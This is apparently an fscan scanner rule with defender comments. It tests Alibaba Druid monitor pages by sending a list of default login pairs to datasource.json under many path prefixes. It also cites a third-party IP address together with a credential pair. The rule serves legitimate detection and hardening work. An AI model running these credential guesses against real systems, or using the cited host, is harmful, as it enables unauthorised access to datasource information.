
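# fscan/WebScan/pocs/druid-monitor-weakpass.yml
#
# Checks whether an Alibaba Druid monitor page answers a request that carries
# one of a short list of default credential pairs.
#
# Defender notes:
# - A match means datasource details from the Druid monitor are readable by
#   anyone who can reach the service. Disable the monitor servlet where it is
#   not needed; otherwise set a non-default loginUsername / loginPassword and
#   restrict access to it by source address.
# - In access logs this check presumably shows up as a burst of POST requests
#   to ".../druid/datasource.json" across the path prefixes listed under
#   `uri`, each with loginUsername/loginPassword in the body.
name: poc-yaml-druid-monitor-weakpass

# Candidate values substituted into the rule through {{weakpass}} and {{uri}}.
# Nesting restored: both lists belong under `sets`.
sets:
  # Form-encoded credential pairs sent as the request body.
  weakpass:
    - loginUsername=admin&loginPassword=admin
    - loginUsername=ry&loginPassword=123456
    - loginUsername=admin&loginPassword=123456
    - loginUsername=ruoyi&loginPassword=admin123
    - loginUsername=dy&loginPassword=123456
    - loginUsername=ruoyi&loginPassword=123456
    - loginUsername=dy&loginPassword=admin123
    - loginUsername=druid&loginPassword=druid
    - loginUsername=admin&loginPassword=admin123
  # Path prefixes under which the monitor is looked for.
  uri:
    - /
    - /api/
    - /admin/
    - /admin-api/
    - /prod-api/
    - /jeecg-boot/
    - /dev-api/
    - /system/
    - /webpage/system/

rules:
  - method: POST
    # Earlier fixed path, kept for reference; the active path below prefixes
    # it with each `uri` value instead.
    # path: /druid/datasource.json
    path: "{{uri}}druid/datasource.json"
    body: "{{weakpass}}"
    # Matches on HTTP 200 plus two Druid-specific markers in the body.
    # NOTE(review): this does not appear to distinguish a monitor that
    # accepted the credentials from one that requires no login at all;
    # confirm which case applies when triaging a hit.
    expression: |
      response.status == 200 && response.body.bcontains(b"FilterClassNames") && response.body.bcontains(b"com.alibaba.druid")

detail:
  author: rootmog
  links:
    - https://github.com/alibaba/druid
    # NOTE(review): the entry below is not a well-formed URL (parenthesised
    # text and a trailing backslash) and names a third-party host together
    # with a credential pair. It is not a stable reference; consider
    # replacing it with vendor documentation.
    - http://39.108.94.156:8086/druid/index.html(admin/123456)\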